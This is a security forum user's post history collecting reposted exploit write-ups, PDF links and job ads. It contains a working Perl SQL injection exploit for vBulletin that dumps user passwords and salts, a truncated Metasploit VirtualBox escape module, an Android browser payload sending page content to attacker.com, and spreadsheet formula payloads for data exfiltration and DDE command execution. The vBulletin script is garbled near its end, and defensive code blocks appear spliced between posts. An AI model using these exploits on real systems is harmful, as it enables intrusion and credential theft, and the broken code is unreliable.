SirGod
Moderators
  • Posts: 784
  • Days Won: 27

Everything posted by SirGod

  1. Background
freenode is a large IRC network providing services to Free and Open Source Software communities, and in September the freenode staff team blogged about a potential compromise of an IRC server. NCC Group’s Cyber Defence Operations team provided pro bono digital forensic and reverse engineering services to assist the freenode infrastructure team with their incident response activities. In this post we discuss a subset of the information we documented about one of the components involved in the compromise, specifically a Linux backdoor with some interesting functionality and features.
One difficulty all attackers face after compromising a system is how to retain control over a long period of time in a stealthy manner. Backdoor tools which listen for incoming connections can be easily identified by a port scan or by listing open sockets. Tools which periodically connect outbound to a server are usually limited to a small number of addresses or a predictable domain generation algorithm. The backdoor discussed in this post avoids these issues by using a novel method for recognising specially generated incoming packets, bypassing most typical host firewalls and enabling the attacker to change IP address without losing access.
Full article (source): https://www.nccgroup.com/en/blog/2014/10/analysis-of-the-linux-backdoor-used-in-freenode-irc-network-compromise/
  2. What do you want to run a mass scan for? Do you happen to administer a large network and want to see which servers are affected so you can remediate them? If so, I'll help you.
  3. Ugly. Mailing list: oss-security - CVE-2014-6271: remote code execution through bash. For the lazy: Source: oss-security - Re: CVE-2014-6271: remote code execution through bash
  4. Tested, it works. If you use the default Android browser, stop using it, at least for now.
[h=4]Introduction[/h]
Same Origin Policy (SOP) is one of the most important security mechanisms applied in modern browsers. The basic idea behind the SOP is that JavaScript from one origin should not be able to access the properties of a website on another origin. The origin is formed by the combination of scheme, domain and port, with the port being an exception in IE. There are some exceptions to SOP, such as the location property and objects with a src attribute. However, the fundamentals are that different origins should not be able to access the properties of one another.
[h=4]SOP Bypass[/h]
A SOP bypass occurs when sitea.com is somehow able to access the properties of siteb.com such as cookies, location, response etc. Due to the nature of the issue and its potential impact, browsers have a very strict model pertaining to it, and a SOP bypass is rarely found in modern browsers. However, they are found once in a while. The following writeup describes a SOP bypass vulnerability I found in my Qmobile Noir A20 running Android Browser 4.2.1, and later verified that Sony Xperia Tipo, Samsung Galaxy, HTC Wildfire, Motorola etc. are also affected. To the best of my knowledge, the issue occurred due to improper handling of null bytes by the URL parser.
Update: Other folks have verified this issue to work under Android browser < 4.4. Ref - https://github.com/rapid7/metasploit-framework/pull/3759
The following is a proof of concept:
[h=4]Proof Of Concept[/h]
[code]
<iframe name="test" src="http://www.rhainfosec.com"></iframe>
<input type=button value="test" onclick="window.open('\u0000javascript:alert(document.domain)','test')" >
[/code]
As you can see, the code tries accessing the document.domain property of a site loaded into an iframe.
If you run the POC at attacker.com on any of the modern browsers, it would return a similar error, as attacker.com should not be able to access the document.domain property of rhainfosec.com.
[code]
Blocked a frame with origin "http://jsbin.com" from accessing a frame with origin "http://www.rhainfosec.com". Protocols, domains, and ports must match. vagugebiweja:7
[/code]
However, running it on any of the vulnerable smartphones' default browsers would alert the document.domain property, indicating that the SOP was not able to restrict access to the document.domain property of a site at a different origin.
I created the following POC, so you can mess around with some stuff:
[h=4]Reading the response[/h]
You can read the response of any page by accessing the document.body.innerHTML property.
[code]
<iframe name="test" src="http://www.rhainfosec.com"></iframe>
<input type=button value="test" onclick="window.open('\u0000javascript:alert(document.body.innerHTML)','test')" >
[/code]
[h=4]Reading the response and sending it to an attacker's domain[/h]
In a real-world situation an attacker would send the response to a domain he controls.
[code]
<iframe name="test" src="http://www.rhainfosec.com"></iframe>
<input type=button value="test" onclick="window.open('\u0000javascript:var i=new Image();i.src='//attacker.com?'+document.body.innerHTML;document.body.appendChild(i);','test')" >
[/code]
[h=4]Bypassing Frame Busting Code[/h]
A lot of websites still use frame busting code to prevent the page from being framed, and we can only bypass SOP here when the site can be framed. In cases where the site is using frame busting code, we can bypass it using the sandbox attribute that was introduced as part of the HTML5 specification.
[code]
<iframe name="test" src="http://www.rhainfosec.com" sandbox></iframe>
<input type=button value="test" onclick="window.open('\u0000javascript:var i=new Image();i.src='//attacker.com?'+document.body.innerHTML;document.body.appendChild(i);','test')" >
[/code]
Update: A Metasploit module has been released by jvennix-r7 which also supports X-Frame-Options bypass, making it a completely universal exploit. Ref - https://github.com/rapid7/metasploit-framework/pull/3759
[h=4]Affected Versions[/h]
The initial tests were carried out on Android browser 4.2.1 (Qmobile) and below and later verified with Galaxy S3, HTC Wildfire, Sony Xperia, Qmobile etc. The following are some of the smartphones I tested with browserstack.com.
[h=4]Samsung Galaxy S3[/h]
[h=4]Motorola Razr[/h]
[h=4]Sony Xperia Tipo[/h]
[h=4]HTC Evo 3D and Wildfire[/h]
Source: Android Browser Same Origin Policy Bypass < 4.4 - CVE-2014-6041 | Learn How To Hack - Ethical Hacking and security tips
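The root cause the post gives (null bytes mishandled by the URL parser) is an instance of a check-versus-use inconsistency: the code that decides whether a URL is script and the code that later loads it do not see the same string. The block below is an added illustration written for this page; it is not code from the post and not the Android Browser source (which is not on the page). Both helpers are hypothetical stand-ins that model the behaviour, next to a hardened check that classifies on the same normalised form the loader uses and rejects control characters outright.

```javascript
// Added example, not from the original post and not Android Browser code: a toy model of
// a URL policy check that mishandles a leading null byte, next to a hardened version.

// Hypothetical policy check written as a literal prefix test on the raw string.
// "\u0000javascript:..." does not start with "javascript:", so it is classified as
// harmless and allowed to target a frame from another origin.
function naiveBlocks(url) {
  return url.toLowerCase().startsWith("javascript:");
}

// Hypothetical loader: strips ASCII control characters before reading the scheme, so
// it sees "javascript:" where the policy check saw "\u0000javascript:".
function loaderScheme(url) {
  const cleaned = url.replace(/[\u0000-\u001f\u007f]/g, "");
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(cleaned);
  return m ? m[1].toLowerCase() : null;
}

// Hardened check: refuse any URL that contains control characters instead of silently
// cleaning it, and otherwise decide on exactly the form the loader will parse.
function strictBlocks(url) {
  if (/[\u0000-\u001f\u007f]/.test(url)) return true;
  return loaderScheme(url) === "javascript";
}

// True when the policy check lets the URL through but the loader would still execute
// it as script inside the target frame: the cross-origin condition the post describes.
function wouldRunCrossOrigin(url, blocks) {
  return !blocks(url) && loaderScheme(url) === "javascript";
}

// Constructed inputs: the post's null-byte form, a plain javascript: URL, a normal page.
const SAMPLES = [
  "\u0000javascript:alert(document.domain)",
  "javascript:alert(1)",
  "http://www.rhainfosec.com",
];

for (const u of SAMPLES) {
  console.log(
    JSON.stringify(u),
    "naive check bypassed:", wouldRunCrossOrigin(u, naiveBlocks),
    "strict check bypassed:", wouldRunCrossOrigin(u, strictBlocks)
  );
}
```

The point is not the particular regular expression but the invariant: whatever normalisation the loader applies, the security decision must be taken on the same normalised value, and inputs that only differ by characters a parser might drop are safest rejected rather than cleaned.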
  5. OWASP Testing Guide v4
     1. Testing Guide Foreword
     2. The OWASP Testing Project
     3. The OWASP Testing Framework
     4. Web Application Security Testing
     5. Reporting
     Link PDF: https://www.owasp.org/images/1/19/OTGv4.pdf
  6. Link PDF: http://www.exploit-db.com/wp-content/themes/exploit/docs/34591.pdf
  7. Also wanted: Web designer: Minimum 2 years experience in graphic design and website implementation; Projects portfolio required; Good knowledge on branding, UI, UX, mobile, front-end frameworks, print; Very good work experience with graphics software: Photoshop and Illustrator mainly (but also Corel Draw, Flash, InDesign etc); HTML5 & CSS3 solid knowledge; Basic JS knowledge; Basic SEO knowledge; Strong English verbal and written communication skills; Good time management and working within deadlines.
  8. Only for serious people. CV via PM. Location: Bucharest.
Java Developer: At least 2 years of experience with web development; English knowledge; University degree in Computer Science or similar; Experience in working with: Java EE development; Web application development (JSP, servlets, XML and HTML); Web frameworks, at least one of the following: Struts 2, Spring MVC, JSF or any other web framework; Build automation tools (Maven); Relational databases, at least one of the following: SQL Server, MySQL, Oracle; SCMs: Git or Svn; Communication protocols: HTTP, TLS/SSL.
PHP Developer: At least 2-3 years experience in web development (advantage for project portfolios); Student or graduate in Automatics, Electronics, Mathematics and Computer Science; Must have high skills of PHP, SQL (MySQL, PostgreSQL), HTML, JavaScript; Nice to have knowledge of XML, RSS, Apache, Linux, communication protocols; English skills; Responsibility and initiative; Interested in a professional career in the web development field.
QA Engineer: University degree in computer science or equivalent; Knowledge of the software development process and life cycle; Knowledge and understanding of the Quality Assurance process; QA experience in minimum 2 medium / large size projects; Medium knowledge of databases, web programming and communication protocols; Programming skills in C#, ASP.NET, PHP, HTML, CSS, AJAX or JavaScript represent an advantage; End to end automated testing experience is an advantage.
  9. Contents:
     A1 - CORS Attacks & CSRF
     A2 - ClickJacking, CORJacking and UI exploits
     A3 - XSS with HTML5 tags, attributes and events
     A4 - Web Storage and DOM information extraction
     A5 - SQLi & Blind Enumeration
     A6 - Web Messaging and Web Workers injections
     A7 - DOM based XSS with HTML5 & Messaging
     A8 - Third party/Offline HTML Widgets and Gadgets
     A9 - Web Sockets and Attacks
     A10 - Protocol/Schema/APIs attacks with HTML5
     Download: https://media.blackhat.com/bh-eu-12/shah/bh-eu-12-Shah_HTML5_Top_10-WP.pdf
  10. [code]
# vBulletin 4.0.x => 4.1.2 AUTOMATIC SQL Injection exploit
# Author: D35m0nd142, <d35m0nd142@gmail.com>
# Google Dork: inurl:search.php?search_type=1
# Date: 02/09/2014
# Vendor Homepage: http://www.vbulletin.com/
# Tested on: vBulletin 4.1.2
# Usage: perl exploit.pl <http://target> <valid username> <valid passwd> <existent group> <userid to hack>
# Tutorial video: https://www.youtube.com/watch?v=_jec3nkoYFc
# IMPORTANT: At the first execution of the exploit I suggest you to login and logout to the forum (with a browser),
# then running it in order to allow the exploit to retrieve the correct security token to use. If you run more than
# one time the exploit, it may not get the security token because of the previous session's cookies and so you may
# have some problems retrieving the correct information. THE SOLUTION IS to copy the correct security token
# previously found (usually at the first run) and paste it into the source code where I wrote 'HERE'.
# Vulnerability discovered by: D4rkB1t (http://www.exploit-db.com/exploits/17314/)

#!/usr/bin/env perl

use LWP::UserAgent;
use HTTP::Cookies;

$ua = LWP::UserAgent->new();
$ua->agent("Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko/20100101 Firefox/31.0");
$ua->cookie_jar({});

$username = "username) from user where userid=$ARGV[4]#";
$email = "email) from user where userid=$ARGV[4]#";
$password = "password) from user where userid=$ARGV[4]#";
$salt = "salt) from user where userid=$ARGV[4]#";

@tofinds = ('database())#');
push(@tofinds,$username);
push(@tofinds,$email);
push(@tofinds,$password);
push(@tofinds,$salt);

sub request {
    my $token = dumping("vbloginout.txt","token");
    if($token eq '') {
        print "SECURITYTOKEN not found (Make sure to log out from any other previous logged sessions before running the exploit).\n";
        #print "Attempting using 1409594055-f2133dfe1f26a36f6349eb3a946ac38c94a182e6 as token.\n";
        $token = "1409750140-51ac26286027a4bc2b2ac38a7483081c2a4b2a3e"; # HERE
        print "Attempting using $token as token.\n";
    } else {
        print "SECURITYTOKEN FOUND: $token\n";
    }
    print "Sending exploit...\n\n";
    sleep(1);
    my $req = HTTP::Request->new(POST => $ARGV[0].'/search.php?search_type=1');
    $req->content_type('application/x-www-form-urlencoded');
    foreach $tofind (@tofinds) {
        $post = "query=$ARGV[3]&titleonly=0&dosearch=Search+Now&memberless=0&memberlimit=&discussionless=0&discussionlimit=&messageless=0&messagelimit=&pictureless=0&picturelimit=&sortby=dateline&order=descending&group_filter_date_lteq_month=0&group_filter_date_lteq_day=1&group_filter_date_lteq_year=&group_filter_date_gteq_month=0&group_filter_date_gteq_day=1&group_filter_date_gteq_year=&saveprefs=1&s=&securitytoken=$token&dofilter=1&do=process&searchfromtype=vBForum%3ASocialGroup&contenttypeid=7&cat[0]=1) UNION SELECT concat(0x3a,0x3a,0x3a,$tofind";
        $req->content($post);
        my $res = $ua->request($req);
        #print $res->headers()->as_string;
        print "\n\n";
        open(FILE0, "> vbloc.txt");
        print FILE0 $res->headers()->as_string;
        close(FILE0);
        my $location = dumping("vbloc.txt","loc");
        if($location !~ /$ARGV[0]/) {
            banner();
            break;
        }
        #print "Location: $location\n";
        my $req1 = HTTP::Request->new(GET => $location);
        $req1->content_type('application/x-www-form-urlencoded');
        my $res1 = $ua->request($req1);
        #print $res1->content;
        print "\n";
        open(FILE,"> vbout.txt");
        print FILE $res1->content;
        close(FILE);
        printout($tofind);
        dumping("vbout.txt","sql");
        print "\n";
    }
    print "\n";
    print "Do you want to run the second exploitation way? (y/n) -> ";
    $want = <STDIN>;
    if($want =~ /y/) {
        second_request($token);
    }
}

sub second_request {
    my ($token) = @_ ;
    print "Attempting using the second exploitation way..\n\n";
    sleep(2);
    my $req = HTTP::Request->new(POST => $ARGV[0].'/search.php');
    $req->content_type('application/x-www-form-urlencoded');
    foreach $tofind (@tofinds) {
        $post = "type%5B%5D=7&query=$ARGV[3]&titleonly=0&searchuser=&exactname=1&tag=&dosearch=Search+Now&searchdate=0&beforeafter=&sortby=relevance&order=descending&saveprefs=1&s=&securitytoken=$token&do=process&searchthreadid=&cat[0]=1) UNION SELECT concat(0x3a,0x3a,0x3a,$tofind";
        $req->content($post);
        my $res = $ua->request($req);
        #print $res->headers()->as_string;
        print "\n\n";
        open(FILE0, "> vbloc.txt");
        print FILE0 $res->headers()->as_string;
        close(FILE0);
        my $location = dumping("vbloc.txt","loc");
        if($location !~ /$ARGV[0]/) {
            banner();
            exit(1);
        }
        #print "Location: $location\n";
        my $req1 = HTTP::Request->new(GET => $location);
        $req1->content_type('application/x-www-form-urlencoded');
        my $res1 = $ua->request($req1);
        #print $res1->content;
        print "\n";
        open(FILE,"> vbout.txt");
        print FILE $res1->content;
        close(FILE);
        printout($tofind);
        dumping("vbout.txt","sql");
        print "\n";
    }
    print "\n";
}

sub banner {
    print "[-] Exploit not successful!\n";
    if(token eq "1409563107-55b86c8f60ad36a41dedff21b06bdc8c9d949303") {
        print "[i] Try to log in and log out from other any other sessions and run the exploit again.\n\n";
    }
}

sub printout {
    my ($tofind) = @_ ;
    if($tofind =~ /username/) {
        print "[+] User($ARGV[4]) Username: ";
    } elsif($tofind =~ /password/) {
        print "[+] User($ARGV[4]) Password: ";
    } elsif($tofind =~ /database/) {
        print "[+] Database Name: ";
    } elsif($tofind =~ /email/) {
        print "[+] User($ARGV[4]) Email: ";
    } elsif($tofind =~ /salt/) {
        print "[+] User($ARGV[4]) Salt: ";
    }
}

sub dumping {
    my ($filename, $par) = @_ ;
    open(MYFILE,"< ", $filename);
    my @files) { unlink $file; }
[/code]
  11. [h=4]By James Kettle, 29 Aug. 2014[/h]
This post introduces Formula Injection, a technique for exploiting ‘Export to Spreadsheet’ functionality in web applications to attack users and steal spreadsheet contents. It also details a command injection exploit for Apache OpenOffice and LibreOffice that can be delivered using this technique.
[h=4]Formula Injection[/h]
Many modern web applications and frameworks offer spreadsheet export functionality, allowing users to download data in a .csv or .xls file suitable for handling in spreadsheet applications like Microsoft Excel and OpenOffice Calc. The resulting spreadsheet’s cells often contain input from untrusted sources such as survey responses, transaction details, and user-supplied addresses. This is inherently risky, because any cells starting with the ‘=’ character will be interpreted by the spreadsheet software as formulae.
For example, picture an online store that allows administrators to export the details of all recent purchases. If a malicious customer buys a product and sets their delivery address to the following:
[code]
=HYPERLINK("http://contextis.co.uk?leak="&A1&A2, "Error: please click for further information")
[/code]
The administrator’s ‘recent purchases’ spreadsheet will contain the following cell:
If the administrator clicks this cell, they will inadvertently exfiltrate the contents of cells A1 and A2 to http://contextis.co.uk, which may include other users’ payment details.
[h=4]Delivering exploits[/h]
Malicious formulae pose a risk even when the embedding spreadsheet doesn’t contain any sensitive information, as they can be used to compromise the viewer’s computer. Dynamic Data Exchange (DDE) is a protocol for interprocess communication under Windows supported by Microsoft Excel, LibreOffice and Apache OpenOffice.
In the latter two, it can be invoked using the following formula:
[code]
=DDE(server; file; item; mode)
[/code]
Context found that by specifying some creative arguments and a magic number, it’s possible to craft a ‘link’ that hijacks the computer of whoever opens the document. The following formula simply launches calc.exe but it could easily conscript the computer into a botnet or just about anything else.
[code]
=DDE("cmd";"/C calc";"__DdeLink_60_870516294")
[/code]
When this formula is viewed in a typical spreadsheet, the user is shown an innocuous warning first:
However, when the payload is inside a CSV, the command is executed before the warning is displayed.
This vulnerability was privately disclosed to the affected vendors on the 9th July 2014. OpenOffice and LibreOffice patched it on 21st August and the 10th July respectively. OpenOffice classified it as CVE-2014-3524 and LibreOffice failed to acknowledge it.
This is unlikely to be the last formula based vulnerability, and formula injection provides an excellent delivery mechanism for such exploits. A given computer’s susceptibility to attack can be assessed using the INFO formula, which helpfully returns the spreadsheet software’s name, operating system and version number. Conditional IF… ELSE statements can then be used to deliver the appropriate payload.
[h=4]Exploiting trust relationships[/h]
A second, more subtle technique can be used to hijack users’ computers without relying on an unpatched vulnerability in client software. We will once again use our good friend DDE, but this time target Microsoft Excel. In Excel, the syntax to execute arbitrary commands is simply:
[code]
=cmd|' /C calc'!A0
[/code]
Microsoft is clearly aware that DDE can be used maliciously; opening a document containing DDE triggers two fearsome security warnings:
However, there is a serious issue with these warning messages. They both recommend that the user should click no if they do not trust the source of the file.
If you had personally generated a spreadsheet from a website you trust, would you trust it? You might if you had skipped the section on formula injection. This is not a vulnerability in Excel, but in every website that places active content from untrusted sources into spreadsheets.
[h=4]Remediation[/h]
Spreadsheet software could take steps to mitigate some of these attacks, but preventing formula injection is ultimately the responsibility of every application that generates spreadsheets containing user-supplied content. At present, the best defence strategy we are aware of is prefixing cells that start with ‘=’ with an apostrophe. This will ensure that the cell isn’t interpreted as a formula, and as a bonus in Microsoft Excel the apostrophe itself will not be displayed. Another lesson from this is that .csv and .tsv files should not be viewed as equivalent to .txt files in terms of safety, as it’s simple to embed active content into them. Finally, ensure you’re running Apache OpenOffice version 4.1.1 or later, and LibreOffice version 4.2.5 or later.
[h=4]Further research[/h]
This issue isn’t specific to web applications or any particular file format – any situation where untrusted content ends up in a spreadsheet could be exploited. Aside from identifying the numerous vulnerable applications, there is plenty of scope for further research on this attack technique itself. A key improvement would be finding a way to extract content from documents without relying on any user interaction. Finally, spreadsheet software presents a soft attack surface relative to web browsers, so it is likely that further investigation may reveal additional formula-based code execution vulnerabilities. Thanks to Rohan Durve for help crafting the DDE payloads, and the OpenOffice security team for gracefully handling them.
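The Remediation section above recommends prefixing any cell that starts with ‘=’ with an apostrophe. The following is an added example written for this page, not code from the post or from Context: a small CSV export helper that applies that rule on the way out, plus a scanner that flags formula-like cells in an existing export for detection. It goes beyond the text in one respect: besides ‘=’, it also neutralises the other leading characters that spreadsheet applications treat as a formula trigger (‘+’, ‘-’, ‘@’, tab and carriage return), which the post does not list. The purchase rows are constructed sample data.

```python
"""Added example (not from the original post): formula-injection-safe CSV export and a
scanner for formula-like cells. The sample rows below are constructed for illustration."""
import csv
import io

# Leading characters that spreadsheet software may parse as the start of a formula.
# The post names '='; the others are added here as a generalisation.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def sanitize_cell(value):
    """Return the text to write for one cell, apostrophe-prefixed if it could be a formula."""
    # Numbers emitted as numbers cannot become formulae; only text needs the prefix.
    if isinstance(value, (int, float)) and not isinstance(value, bool):
        return str(value)
    text = "" if value is None else str(value)
    if text.startswith(FORMULA_TRIGGERS):  # str.startswith accepts a tuple of prefixes
        return "'" + text
    return text


def export_csv(rows, header):
    """Write header and rows to a CSV string, sanitising every user-supplied cell."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writerow(header)
    for row in rows:
        writer.writerow([sanitize_cell(c) for c in row])
    return buf.getvalue()


def find_formula_cells(csv_text):
    """Detection side: list (row, column) positions whose cell starts with a formula trigger."""
    hits = []
    for r, row in enumerate(csv.reader(io.StringIO(csv_text))):
        for c, cell in enumerate(row):
            if cell.startswith(FORMULA_TRIGGERS):
                hits.append((r, c))
    return hits


# Constructed sample data: one ordinary purchase and one whose address is the post's
# HYPERLINK payload, exactly as a malicious customer might have typed it.
PURCHASES = [
    ("Alice", "10 Example Street", 19.99),
    ("Mallory",
     '=HYPERLINK("http://contextis.co.uk?leak="&A1&A2, "Error: please click for further information")',
     5.00),
]
HEADER = ("customer", "address", "total")


if __name__ == "__main__":
    out = export_csv(PURCHASES, HEADER)
    print(out)
    print("formula-like cells after sanitising:", find_formula_cells(out))
    print("formula-like cells in a raw export:", find_formula_cells("a,=1+1\n-5,b\n"))
```

The apostrophe survives CSV quoting unchanged, so when the export is opened the cell holds the literal text rather than a formula, which is the behaviour the post describes for Excel. The scanner is the same rule run in reverse and is useful as a regression test on whatever export path an application already has.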
  12. By Brad Antoniewicz.
I've been an adjunct professor at NYU Poly for almost two years now. It's been a great experience for a number of reasons, one of which is because I'm teaching a hot topic: Vulnerability Analysis and Exploitation. The course is the next iteration of the pentest.cryptocity.net content that evolved into the CTF Field Guide by Dan Guido, Trail of Bits, and a bunch of other industry professionals. It takes a student with some minor programming knowledge and submerges them into exploitation. When the student comes out, they have successfully exploited IE on Windows 7, bypassing DEP and ASLR. It's an awesome, but sometimes overwhelming experience for every student who takes it.
Each semester I start the class off with a survey to gauge the students' experience level:
No surprise here, most have little to no experience when it comes to real-world exploitation on Windows. This results in a "revamping" period for the student where they have to work extra hard getting used to WinDBG and IDA. I wanted to create something that would help ease the students into the learning environment, and that's what FSExploitMe is: a tutorial that walks you through the basics of WinDBG and general exploitation in a browser environment. FSExploitMe is based on Vulnerable.ocx, developed by the original creators of the class.
[h=1]Installation[/h]
FSExploitMe is a self-contained, ActiveX based tutorial that you download and run locally within your browser. You'll want to run this in a VM, as it makes your browser vulnerable to attack. Ensure you have the Microsoft Visual C++ 2010 Redistributable Package installed. Then just double click FSExploitMe.html to get started.
You'll have to allow the extension to run by right clicking the banner and selecting "Allow Blocked Content...":
Next Internet Explorer will ask you if you'd like to allow the active content to run, click "Yes":
Then finally you'll get a UAC prompt, click "Yes" here as well:
FSExploitMe should be all ready to go now:
Internet Explorer 8 looks a little less pretty than newer versions. IE8 is the recommended version strictly because Lesson 3 of FSExploitMe executes a HeapSpray that will not work on newer versions of IE. You can easily replace that function to use a newer HeapSpray, I just haven't done that and tested it on all other IE versions. That being said, future iterations of FSExploitMe will include a more robust HeapSpray function.
It will help to have Symbols when you start debugging. The easiest way to do that is by copying the FSExploitMe.pdb file to the C:\Windows\Downloaded Program Files directory. Then once you launch WinDBG, add that path to your Symbol Path:
[code]
.sympath+ C:\Windows\Downloaded Program Files
[/code]
[h=1]About the Lessons[/h]
When you first open FSExploitMe.html in your browser, you'll arrive at the welcome screen which gives you an overview of the Installation plus learning resources to get you off the ground with x86, IDA and WinDBG if you have absolutely no experience with them. You can return back to this page by clicking the "FSExploitMe" heading on the upper left of the page. Each activity is broken up into Lessons and can be accessed by using the links on the upper right of the screen:
On newer versions, it will look a little prettier. I promise, I'll put in that new HeapSpray function soon.
[h=2]Lesson 1 - Learning WinDBG[/h]
Lesson 1 is entirely dedicated to WinDBG since it is so important to the whole exploitation process. The questions will require you to set breakpoints, dig into memory, and execute some common commands to obtain answers.
[h=2]Lesson 2 - Stack-Based Overflow[/h]
Lesson 2 is focused around exploiting a basic stack-based overflow. The questions require you to understand how the stack operates, how to triage a stack-based overflow and finally how to exploit the condition. The first round walks you through the exploitation, the second is a bit harder - there is no walkthrough and it requires the use of IDA.
[h=2]Lesson 3 - Use-After-Free on the Heap[/h]
Lesson 3 walks you through a use-after-free vulnerability on the heap. The questions help you understand how data is stored on the heap, how virtual function tables and pointers are structured, how to triage a use-after-free and finally how to exploit it. This very much mimics a traditional browser use-after-free and should get you on the right track when you have to tackle a real-world vulnerability.
[h=2]Upcoming Lessons[/h]
The next few lessons that will be written will focus on bypassing exploit mitigations! Stay tuned!
[h=1]Download[/h]
FSExploitMe is available for download now! Answers can be provided if you just ask me for them, and you're not one of my students. https://github.com/OpenSecurityResearch/FSExploitMe Feedback welcome!
  13. 1. Browser fuzzing technology
      2. Advanced browser exploitation techniques
      3. IE 11 0day exploit development
      Link PDF: http://hitcon.org/2014/downloads/P1_06_Chen%20Zhang%20-%20Smashing%20The%20Browser%20-%20From%20Vulnerability%20Discovery%20To%20Exploit.pdf
  14. [code]
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Local
  Rank = AverageRanking

  DEVICE = '\\\\.\\VBoxGuest'
  INVALID_HANDLE_VALUE = 0xFFFFFFFF

  # VBOX HGCM protocol constants
  VBOXGUEST_IOCTL_HGCM_CONNECT = 2269248
  VBOXGUEST_IOCTL_HGCM_DISCONNECT = 2269252
  VBOXGUEST_IOCTL_HGCM_CALL = 2269256
  CONNECT_MSG_SIZE = 140
  DISCONNECT_MSG_SIZE = 8
  SET_VERSION_MSG_SIZE = 40
  SET_PID_MSG_SIZE = 28
  CALL_EA_MSG_SIZE = 40
  VERR_WRONG_ORDER = 0xffffffea
  SHCRGL_GUEST_FN_SET_PID = 12
  SHCRGL_CPARMS_SET_PID = 1
  SHCRGL_GUEST_FN_SET_VERSION = 6
  SHCRGL_CPARMS_SET_VERSION = 2
  SHCRGL_GUEST_FN_INJECT = 9
  SHCRGL_CPARMS_INJECT = 2
  CR_PROTOCOL_VERSION_MAJOR = 9
  CR_PROTOCOL_VERSION_MINOR = 1
  VMM_DEV_HGCM_PARM_TYPE_32_BIT = 1
  VMM_DEV_HGCM_PARM_TYPE_64_BIT = 2
  VMM_DEV_HGCM_PARM_TYPE_LIN_ADDR = 5

  def initialize(info={})
    super(update_info(info, {
      'Name'           => 'VirtualBox 3D Acceleration Virtual Machine Escape',
      'Description'    => %q{
        This module exploits a vulnerability in the 3D Acceleration support for VirtualBox.
        The vulnerability exists in the remote rendering of OpenGL-based 3D graphics. By
        sending a sequence of specially crafted of rendering messages, a virtual machine can
        exploit an out of bounds array access to corrupt memory and escape to the host. This
        module has been tested successfully on Windows 7 SP1 (64 bits) as Host running
        Virtual Box 4.3.6.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [
        'Francisco Falcon', # Vulnerability Discovery and PoC
        'Florian Ledoux',   # Win 8 64 bits exploitation analysis
        'juan vazquez'      # MSF module
      ],
      'Arch'           => ARCH_X86_64,
      'Platform'       => 'win',
      'SessionTypes'   => ['meterpreter'],
      'DefaultOptions' => {
        'EXITFUNC' => 'thread'
      },
      'Targets'        => [
        [ 'VirtualBox 4.3.6 / Windows 7 SP1 / 64 bits (ASLR/DEP bypass)', { :messages => :target_virtualbox_436_win7_64 } ]
      ],
      'Payload'        => {
        'Space'       => 7000,
        'DisableNops' => true
      },
      'References'     => [
        ['CVE', '2014-0983'],
        ['BID', '66133'],
        ['URL', 'http://www.coresecurity.com/advisories/oracle-virtualbox-3d-acceleration-multiple-memory-corruption-vulnerabilities'],
        ['URL', 'http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=publication&name=oracle_virtualbox_3d_acceleration'],
        ['URL', 'http://www.vupen.com/blog/20140725.Advanced_Exploitation_VirtualBox_VM_Escape.php']
      ],
      'DisclosureDate' => 'Mar 11 2014',
      'DefaultTarget'  => 0
    }))
  end

  def open_device
    r = session.railgun.kernel32.CreateFileA(DEVICE, "GENERIC_READ | GENERIC_WRITE", 0, nil, "OPEN_EXISTING", "FILE_ATTRIBUTE_NORMAL", 0)
    handle = r['return']

    if handle == INVALID_HANDLE_VALUE
      return nil
    end

    return handle
  end

  def send_ioctl(ioctl, msg)
    result = session.railgun.kernel32.DeviceIoControl(@handle, ioctl, msg, msg.length, msg.length, msg.length, 4, "")

    if result["GetLastError"] != 0
      unless result["ErrorMessage"].blank?
        vprint_error("#{result["ErrorMessage"]}")
      end
      return nil
    end

    unless result["lpBytesReturned"] && result["lpBytesReturned"] == msg.length
      unless result["ErrorMessage"].blank?
        vprint_error("#{result["ErrorMessage"]}")
      end
      return nil
    end

    unless result["lpOutBuffer"] && result["lpOutBuffer"].unpack("V").first == 0
      unless result["ErrorMessage"].blank?
        vprint_error("#{result["ErrorMessage"]}")
      end
      return nil
    end

    result
  end

  def connect
    msg = "\x00" * CONNECT_MSG_SIZE
    msg[4, 4] = [2].pack("V")
    msg[8, "VBoxSharedCrOpenGL".length] = "VBoxSharedCrOpenGL"

    result = send_ioctl(VBOXGUEST_IOCTL_HGCM_CONNECT, msg)

    if result.nil?
      return result
    end

    client_id = result["lpOutBuffer"][136, 4].unpack("V").first
    client_id
  end

  def disconnect
    msg = "\x00" * DISCONNECT_MSG_SIZE
    msg[4, 4] = [@client_id].pack("V")

    result = send_ioctl(VBOXGUEST_IOCTL_HGCM_DISCONNECT, msg)
    result
  end

  def set_pid(pid)
    msg = "\x00" * SET_PID_MSG_SIZE
    msg[0, 4] = [VERR_WRONG_ORDER].pack("V")
    msg[4, 4] = [@client_id].pack("V") # u32ClientID
    msg[8, 4] = [SHCRGL_GUEST_FN_SET_PID].pack("V")
    msg[12, 4] = [SHCRGL_CPARMS_SET_PID].pack("V")
    msg[16, 4] = [VMM_DEV_HGCM_PARM_TYPE_64_BIT].pack("V")
    msg[20, 4] = [pid].pack("V")

    result = send_ioctl(VBOXGUEST_IOCTL_HGCM_CALL, msg)
    result
  end

  def set_version
    msg = "\x00" * SET_VERSION_MSG_SIZE
    msg[0, 4] = [VERR_WRONG_ORDER].pack("V")
    msg[4, 4] = [@client_id].pack("V") # u32ClientID
    msg[8, 4] = [SHCRGL_GUEST_FN_SET_VERSION].pack("V")
    msg[12, 4] = [SHCRGL_CPARMS_SET_VERSION].pack("V")
    msg[16, 4] = [VMM_DEV_HGCM_PARM_TYPE_32_BIT].pack("V")
    msg[20, 4] = [CR_PROTOCOL_VERSION_MAJOR].pack("V")
    msg[28, 4] = [VMM_DEV_HGCM_PARM_TYPE_32_BIT].pack("V")
    msg[32, 4] = [CR_PROTOCOL_VERSION_MINOR].pack("V")

    result = send_ioctl(VBOXGUEST_IOCTL_HGCM_CALL, msg)
    result
  end

  def trigger(buff_addr, buff_length)
    msg = "\x00" * CALL_EA_MSG_SIZE
